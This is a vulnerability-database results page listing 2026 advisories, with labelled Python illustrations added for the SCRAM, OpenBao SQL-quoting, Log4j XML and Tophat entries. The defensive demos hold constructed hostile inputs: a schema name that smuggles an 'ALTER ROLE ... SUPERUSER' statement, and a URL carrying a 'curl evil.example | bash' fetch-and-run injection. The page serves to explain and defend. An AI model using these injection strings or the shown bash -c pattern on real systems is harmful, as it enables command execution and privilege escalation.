569 matches found

CNNVD
added 2026/04/25 12:00 a.m.

JIZHICMS injection vulnerability

JIZHICMS is an open-source content management system developed by JIZHI Corporation in China. JIZHICMS 2.5.6 and earlier have a SQL injection vulnerability. The vulnerability stems from improper handling of parameters in the htmlspecialcharsdecode function located at...

CVSS 5.8 | AI score 5.9 | EPSS 0.00253
Exploits: 0 | References: 2
Positive Technologies
added 2026/04/23 12:00 a.m.

PT-2026-34666

Jizhicms v2.5.4 is vulnerable to SQL injection in the product editing module...

AI score 5.8 | EPSS 0.00359
Exploits: 1 | References: 5
Github Security Blog
added 2026/04/22 9:31 a.m.

Apache HttpClient accepts SCRAM-SHA-256 authentication without proper mutual authentication verification

A missing critical step in authentication in Apache HttpClient 5.6 allows an attacker to cause the client to accept SCRAM-SHA-256 authentication without proper mutual authentication verification. Users are recommended to upgrade to version 5.6.1, which fixes this issue...

CVSS 7.3 | AI score 5.2 | EPSS 0.00456
Exploits: 0 | References: 5 | Affected software: 1
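The missing step the advisory refers to is the client's check of the server-final-message. In SCRAM (RFC 5802, with SHA-256 per RFC 7677) the server proves that it knows the password by returning v=ServerSignature, and a client that never compares that value against its own computation will accept any server that replies without an error. The following is an added illustration in Python, not Apache HttpClient's code; the user name, password, nonces and salt are constructed values, and demo() contrasts a client that verifies with one that skips the check:

```python
import base64
import hashlib
import hmac

# Constructed demo values (not from any real deployment). In a real exchange the
# client nonce is random per session and the server appends its own nonce.
USER = "user"
PASSWORD = "pencil"
CLIENT_NONCE = "rOprNGfwEbeRWgbNEkqO"
SERVER_NONCE = "%hvYDpWUa2RaTCAfuxFIlj)hNlF$k0"
SALT = base64.b64decode("W22ZaJ0SNY7soEsUEjb6gQ==")
ITERATIONS = 4096


def hmac_sha256(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.sha256).digest()


def salted_password(password: str, salt: bytes, iterations: int) -> bytes:
    # Hi() in RFC 5802 is PBKDF2 with HMAC-SHA-256 and a 32-byte output.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, 32)


def auth_message(user: str, cnonce: str, snonce: str, salt: bytes, iterations: int) -> bytes:
    # AuthMessage = client-first-message-bare + "," + server-first-message + ","
    #               + client-final-message-without-proof   (RFC 5802 section 3)
    client_first_bare = f"n={user},r={cnonce}"
    server_first = f"r={cnonce}{snonce},s={base64.b64encode(salt).decode()},i={iterations}"
    client_final_without_proof = f"c=biws,r={cnonce}{snonce}"   # c=biws is base64("n,,")
    return ",".join([client_first_bare, server_first, client_final_without_proof]).encode("utf-8")


def client_proof(password: str, salt: bytes, iterations: int, auth_msg: bytes) -> bytes:
    # ClientProof = ClientKey XOR HMAC(StoredKey, AuthMessage); sent in the client-final-message.
    sp = salted_password(password, salt, iterations)
    client_key = hmac_sha256(sp, b"Client Key")
    stored_key = hashlib.sha256(client_key).digest()
    client_sig = hmac_sha256(stored_key, auth_msg)
    return bytes(a ^ b for a, b in zip(client_key, client_sig))


def server_signature(password: str, salt: bytes, iterations: int, auth_msg: bytes) -> bytes:
    # ServerSignature = HMAC(ServerKey, AuthMessage); only a party holding the
    # password (or the stored ServerKey) can compute it.
    server_key = hmac_sha256(salted_password(password, salt, iterations), b"Server Key")
    return hmac_sha256(server_key, auth_msg)


def server_final_message(password: str, salt: bytes, iterations: int, auth_msg: bytes) -> str:
    return "v=" + base64.b64encode(server_signature(password, salt, iterations, auth_msg)).decode()


def client_accepts(server_final: str, expected_sig: bytes, verify_server: bool = True) -> bool:
    """Decide whether the client treats authentication as complete.

    verify_server=True is the correct behaviour: the v= value must equal the
    ServerSignature the client computed itself. verify_server=False models a
    client that accepts any non-error reply after sending its proof, which is
    what 'missing mutual authentication verification' means in practice.
    """
    if server_final.startswith("e="):
        return False
    if not verify_server:
        return True
    if not server_final.startswith("v="):
        return False
    try:
        presented = base64.b64decode(server_final[2:], validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return False
    return hmac.compare_digest(presented, expected_sig)


def demo() -> dict:
    auth_msg = auth_message(USER, CLIENT_NONCE, SERVER_NONCE, SALT, ITERATIONS)
    expected = server_signature(PASSWORD, SALT, ITERATIONS, auth_msg)
    honest = server_final_message(PASSWORD, SALT, ITERATIONS, auth_msg)
    # An impostor that does not know the password can still emit a v= line.
    impostor = server_final_message("wrong-guess", SALT, ITERATIONS, auth_msg)
    return {
        "honest_verified": client_accepts(honest, expected, verify_server=True),
        "impostor_verified": client_accepts(impostor, expected, verify_server=True),
        "impostor_unverified": client_accepts(impostor, expected, verify_server=False),
        "proof_len": len(client_proof(PASSWORD, SALT, ITERATIONS, auth_msg)),
    }
```

The comparison uses hmac.compare_digest so that the check is constant-time; the interesting row is impostor_unverified, where a client without the v= check completes authentication against a server that could not have known the password.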
Vulnrichment
added 2026/04/21 8:30 p.m.

CVE-2026-6796 Sanluan PublicCMS Failed Login LoginAdminController.java log_login cleartext storage in file

A vulnerability was found in Sanluan PublicCMS up to 6.202506.d. Affected is the function log_login of the file core/src/main/java/com/publiccms/controller/admin/LoginAdminController.java of the component Failed Login Handler. Manipulation of the argument errorPassword causes cleartext...

CVSS 5.3 | AI score 5.5 | EPSS 0.00147
Exploits: 0 | References: 3
OSV
added 2026/04/21 6:27 p.m.

GHSA-P49J-V9WC-WG57 OpenBao's Token Store Allows Cross-Namespace Renewal, Revocation

Impact: OpenBao's namespaces provide multi-tenant separation. A tenant who leaks token accessors can have their token revoked or renewed by a privileged administrator in another tenant. Patches: This was addressed in v2.5.3...

CVSS 2 | AI score 5.8 | EPSS 0.00301
Exploits: 0 | References: 6
EUVD
added 2026/04/21 6:26 p.m.

EUVD-2026-24035

OpenBao's SQL Injection in PostgreSQL database secrets engine...

CVSS 4.6 | AI score 5.8 | EPSS 0.00235
Exploits: 0 | References: 5
Github Security Blog
added 2026/04/21 5:26 p.m.

OpenBao's Certificate Authentication Allows Token Renewal With Different Certificate

Background: OpenBao's Certificate authentication method, when a token renewal is requested and disable_binding=true is set, attempts to verify that the mTLS certificate presented on the current request matches the original. Token renewals for other authentication methods do not require any supplied login...

CVSS 3.1 | AI score 5.6 | EPSS 0.00101
Exploits: 0 | References: 6 | Affected software: 1
ATTACKERKB
added 2026/04/21 12:19 a.m.

CVE-2026-39946

OpenBao is an open source identity-based secrets management system. Prior to version 2.5.3, when OpenBao revoked privileges on a role in the PostgreSQL database secrets engine, OpenBao failed to use proper database quoting on schema names provided by PostgreSQL. This could lead to role revocation...

CVSS 4.6 | AI score 5.8 | EPSS 0.00235
Exploits: 0 | References: 2 | Affected software: 1
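Why an unquoted, catalog-supplied schema name is SQL injection: PostgreSQL accepts almost any string as a quoted schema name (CREATE SCHEMA "evil; ..." is legal), so a tenant who can create schemas controls text that the revocation code later pastes into its own REVOKE statement. The following added Python example, not OpenBao's code, implements PostgreSQL's double-quote identifier rule (the same rule quote_ident() applies in SQL and pq.QuoteIdentifier applies in Go: wrap in double quotes, double any embedded double quote) and a small statement splitter that shows what a multi-statement Exec would see; the schema and role names are constructed:

```python
def quote_ident(name: str) -> str:
    """Quote a PostgreSQL identifier: wrap in double quotes and double any
    embedded double quote. NUL is rejected because identifiers cannot hold it."""
    if "\x00" in name:
        raise ValueError("identifier contains NUL")
    return '"' + name.replace('"', '""') + '"'


def revoke_sql_vulnerable(schema: str, role: str) -> str:
    # Flawed pattern: the schema name read back from the catalog is interpolated verbatim.
    return f"REVOKE ALL PRIVILEGES ON ALL TABLES IN SCHEMA {schema} FROM {quote_ident(role)};"


def revoke_sql_hardened(schema: str, role: str) -> str:
    # Every identifier that did not originate in our own code goes through quote_ident.
    return f"REVOKE ALL PRIVILEGES ON ALL TABLES IN SCHEMA {quote_ident(schema)} FROM {quote_ident(role)};"


def split_statements(sql: str) -> list:
    """Split on ';' outside single- and double-quoted tokens, honouring doubled
    quotes as escapes. Models how a multi-statement execution sees the string."""
    stmts, buf, quote, i = [], [], None, 0
    while i < len(sql):
        ch = sql[i]
        if quote:
            buf.append(ch)
            if ch == quote:
                if i + 1 < len(sql) and sql[i + 1] == quote:   # doubled quote: stay inside
                    buf.append(quote)
                    i += 1
                else:
                    quote = None
        elif ch in ("'", '"'):
            quote = ch
            buf.append(ch)
        elif ch == ";":
            stmt = "".join(buf).strip()
            if stmt:
                stmts.append(stmt)
            buf = []
        else:
            buf.append(ch)
        i += 1
    tail = "".join(buf).strip()
    if tail:
        stmts.append(tail)
    return stmts


# Constructed hostile schema name: legal in PostgreSQL when created with CREATE SCHEMA "...".
HOSTILE_SCHEMA = "evil; ALTER ROLE app_reader SUPERUSER; --"


def demo() -> dict:
    return {
        "vulnerable": split_statements(revoke_sql_vulnerable(HOSTILE_SCHEMA, "app_reader")),
        "hardened": split_statements(revoke_sql_hardened(HOSTILE_SCHEMA, "app_reader")),
    }
```

In the vulnerable rendering the schema name turns one REVOKE into three statements, the second of which grants superuser and the third of which comments out the original FROM clause; in the hardened rendering the whole name stays inside one quoted identifier and there is exactly one statement.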
EUVD
added 2026/04/15 5:26 p.m.

EUVD-2026-22991

Git for Windows is the Windows port of Git. Versions prior to 2.53.0.windows.3 do not have protections that prevent attackers from obtaining a user's NTLM hash. The NTLM hash can be obtained by tricking users into cloning a malicious repository, or checking out a malicious branch, that accesses a...

CVSS 7.4 | AI score 5.8 | EPSS 0.00316
Exploits: 0 | References: 5
Tenable Nessus
added 2026/04/14 12:00 a.m.

RockyLinux 8 : ruby:2.5 (RLSA-2023:7025)

The remote RockyLinux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2023:7025 advisory: ruby/cgi-gem: HTTP response splitting in CGI (CVE-2021-33621); ruby: Buffer overrun in String-to-Float conversion (CVE-2022-28739); ruby: ReDoS vulnerability i...

CVSS 8.8 | AI score 7 | EPSS 0.04127
Exploits: 1 | References: 9
OSV
added 2026/04/10 4:16 p.m.

DEBIAN-CVE-2026-34480

Apache Log4j Core's XmlLayout (https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout), in versions up to and including 2.25.3, fails to sanitize characters forbidden by the XML 1.0 specification (https://www.w3.org/TR/xml/#charsets), producing invalid XML output whenever a log message or M...

CVSS 7.5 | AI score 5.3 | EPSS 0.0086
Exploits: 0 | References: 1
OSV
added 2026/04/10 4:16 p.m.

UBUNTU-CVE-2026-34480

Apache Log4j Core's XmlLayout (https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout), in versions up to and including 2.25.3, fails to sanitize characters forbidden by the XML 1.0 specification (https://www.w3.org/TR/xml/#charsets), producing invalid XML output whenever a log message or M...

CVSS 7.5 | AI score 5.7 | EPSS 0.0086
Exploits: 0 | References: 8
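The Debian and Ubuntu entries above describe the same defect. Characters outside the XML 1.0 Char production (C0 controls other than tab, LF and CR, the surrogate range, and U+FFFE/U+FFFF) cannot be represented with entity references at all, so entity-escaping the markup characters is not enough: a layout has to drop or replace them, or any conforming parser downstream rejects the whole document and the log pipeline loses more than one event. The following added Python example, not Log4j code, implements the Char check, renders a log event with and without that step, and uses the standard-library expat parser to show which output is well-formed; the log line is constructed:

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape, quoteattr


def is_xml_char(cp: int) -> bool:
    # XML 1.0, production [2]:
    # Char ::= #x9 | #xA | #xD | [#x20-#xD7FF] | [#xE000-#xFFFD] | [#x10000-#x10FFFF]
    return (cp in (0x9, 0xA, 0xD)
            or 0x20 <= cp <= 0xD7FF
            or 0xE000 <= cp <= 0xFFFD
            or 0x10000 <= cp <= 0x10FFFF)


def sanitize_xml_text(text: str, replacement: str = "\ufffd") -> str:
    """Replace every code point XML 1.0 forbids with a placeholder. This is a
    separate step from markup escaping, which only handles &, < and >."""
    return "".join(ch if is_xml_char(ord(ch)) else replacement for ch in text)


def render_event(level: str, message: str, sanitize: bool = True) -> str:
    """Render one log event as an XML element. sanitize=False reproduces the
    flawed behaviour: markup is escaped but forbidden characters pass through."""
    if sanitize:
        level, message = sanitize_xml_text(level), sanitize_xml_text(message)
    return f"<event level={quoteattr(level)}><message>{escape(message)}</message></event>"


def well_formed(xml_doc: str) -> bool:
    """True if the standard-library expat parser accepts the document."""
    try:
        ET.fromstring(xml_doc)
        return True
    except (ET.ParseError, ValueError):
        return False


# Constructed log line: an attacker-controlled field carrying ESC, NUL and markup.
HOSTILE_MESSAGE = "login failed for user \x1b[2Jadmin\x00 <script>"


def demo() -> dict:
    return {
        "unsanitized_ok": well_formed(render_event("WARN", HOSTILE_MESSAGE, sanitize=False)),
        "sanitized_ok": well_formed(render_event("WARN", HOSTILE_MESSAGE, sanitize=True)),
        "sanitized": sanitize_xml_text(HOSTILE_MESSAGE),
    }
```

Replacing with U+FFFD keeps the evidence that something was stripped; a production layout might instead emit a visible escape such as \u001B so that the original byte remains recoverable for forensics.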
RedhatCVE
added 2026/04/09 7:23 p.m.

CVE-2026-39662

Missing Authorization vulnerability in ProWCPlugins Product Price by Formula for WooCommerce (product-price-by-formula-for-woocommerce) allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Product Price by Formula for WooCommerce: from n/a through <= 2.5.6...

CVSS 5.3 | AI score 5.9 | EPSS 0.0019
Exploits: 0 | References: 1
NVD
added 2026/04/08 9:16 a.m.

CVE-2026-39662

Missing Authorization vulnerability in ProWCPlugins Product Price by Formula for WooCommerce (product-price-by-formula-for-woocommerce) allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Product Price by Formula for WooCommerce: from n/a through <= 2.5.6...

CVSS 5.3 | EPSS 0.0019
Exploits: 0 | References: 1
CVE
added 2026/04/08 8:30 a.m.

CVE-2026-39710

CVE-2026-39710 affects WordPress RT-Theme 18 | Extensions (rt18-extensions) up to version 2.5. The issue is a CSRF vulnerability that could allow actions on behalf of authenticated users. The root cause and affected component are described across multiple feeds; the primary fix recommended is upd...

CVSS 5.4 | AI score 5.9 | EPSS 0.00097
Exploits: 0 | References: 1
ATTACKERKB
added 2026/04/08 8:30 a.m.

CVE-2026-39641

Cross-Site Request Forgery (CSRF) vulnerability in Skywarrior Blackfyre (blackfyre) allows Cross Site Request Forgery. This issue affects Blackfyre: from n/a through <= 2.5.4...

AI score 5.9 | EPSS 0.00169
Exploits: 0 | References: 2
Cvelist
added 2026/04/08 8:30 a.m.

CVE-2026-39641 WordPress Blackfyre theme <= 2.5.4 - Cross Site Request Forgery (CSRF) vulnerability

Cross-Site Request Forgery (CSRF) vulnerability in Skywarrior Blackfyre (blackfyre) allows Cross Site Request Forgery. This issue affects Blackfyre: from n/a through <= 2.5.4...

CVSS 6.5 | EPSS 0.00169
Exploits: 0 | References: 1
Positive Technologies
added 2026/04/08 12:00 a.m.

PT-2026-31441

Tophat is a mobile applications testing harness. Prior to 2.5.1, Tophat is affected by remote code execution via crafted tophat:// or http://localhost:29070 URLs. The arguments query parameter flows unsanitized from URL parsing through to /bin/bash -c execution, allowing an attacker to execute...

CVSS 8.7 | AI score 6.7 | EPSS 0.00555
Exploits: 0 | References: 3
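What turns this into remote code execution is the last hop: a query parameter concatenated into a string handed to /bin/bash -c, where ';', '|', '$(...)' and friends are interpreted by the shell rather than passed to the harness. The following added Python example, not Tophat's code, shows that flawed construction beside a handler that restricts the URL scheme and host, tokenizes the parameter, validates each token against an allowlist and builds an argv list so no shell is involved; the harness path, allowed hosts, token pattern and limits are hypothetical, and neither function executes anything (both return the argv they would run):

```python
import re
import shlex
from urllib.parse import parse_qs, urlsplit

# Hypothetical values for the demo; none of these are Tophat's real paths or limits.
HARNESS_BIN = "/opt/harness/bin/run-tests"
ALLOWED_SCHEMES = {"tophat", "http"}
ALLOWED_HTTP_HOSTS = {"localhost:29070"}
# Letters, digits and a few punctuation characters; no shell metacharacters.
SAFE_TOKEN = re.compile(r"^-{0,2}[A-Za-z0-9_][A-Za-z0-9_.:=/-]{0,63}$")
MAX_ARGS = 16


def extract_arguments(url: str) -> str:
    """Pull the 'arguments' query parameter out of a tophat:// or local http:// URL."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"unsupported scheme {parts.scheme!r}")
    if parts.scheme == "http" and parts.netloc not in ALLOWED_HTTP_HOSTS:
        raise ValueError(f"unexpected host {parts.netloc!r}")
    values = parse_qs(parts.query).get("arguments", [])
    return values[0] if values else ""


def vulnerable_command(url: str) -> list:
    """The flawed pattern: raw parameter text interpolated into a shell command line.
    Returns the argv that would be passed to subprocess; not executed here."""
    return ["/bin/bash", "-c", f"{HARNESS_BIN} {extract_arguments(url)}"]


def hardened_command(url: str) -> list:
    """Tokenize, validate every token against the allowlist, and return an argv
    list; with no shell in the path, metacharacters are just bytes."""
    tokens = shlex.split(extract_arguments(url))
    if len(tokens) > MAX_ARGS:
        raise ValueError("too many arguments")
    for tok in tokens:
        if not SAFE_TOKEN.match(tok):
            raise ValueError(f"rejected argument {tok!r}")
    return [HARNESS_BIN, *tokens]


# Constructed URLs: one benign, one carrying a command injection in 'arguments'.
BENIGN_URL = "tophat://run?arguments=--suite%20smoke%20--device%3Dpixel7"
HOSTILE_URL = ("http://localhost:29070/run?arguments="
               "smoke%3B%20curl%20http%3A%2F%2Fevil.example%2Fp%7Cbash")


def demo() -> dict:
    out = {
        "benign": hardened_command(BENIGN_URL),
        "vulnerable": vulnerable_command(HOSTILE_URL),
    }
    try:
        hardened_command(HOSTILE_URL)
        out["hostile_rejected"] = False
    except ValueError:
        out["hostile_rejected"] = True
    return out
```

Tokenizing with shlex and then allowlisting is deliberately stricter than "escape and keep using bash -c": an escaped string is still parsed by a shell, whereas an argv list never is, and the allowlist additionally stops tokens that are harmless to the shell but dangerous to the harness itself.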
CVE
added 2026/04/07 8:57 a.m.

CVE-2026-34903

The CVE-2026-34903 entry describes a Missing Authorization vulnerability in OceanWP Ocean Extra, affecting Ocean Extra up to version 2.5.3. The issue is categorized as Broken Access Control with CVSS 3.1 base score 5.4 (Network, Low Privileges Required, No User Interaction, Confidentiality None...

CVSS 5.4 | AI score 5.9 | EPSS 0.00293
Exploits: 0 | References: 1
RedhatCVE
added 2026/04/01 11:00 p.m.

CVE-2026-34405

Nuxt OG Image generates OG images from Vue templates in Nuxt. Prior to version 6.2.5, the image-generation component served at the URI /og/d/ (and, in older versions, /og-image/) contains a vulnerability that allows injection of arbitrary attributes into the HTML page body. This issue has been patched in...

CVSS 6.1 | AI score 5.9 | EPSS 0.00216
Exploits: 1 | References: 1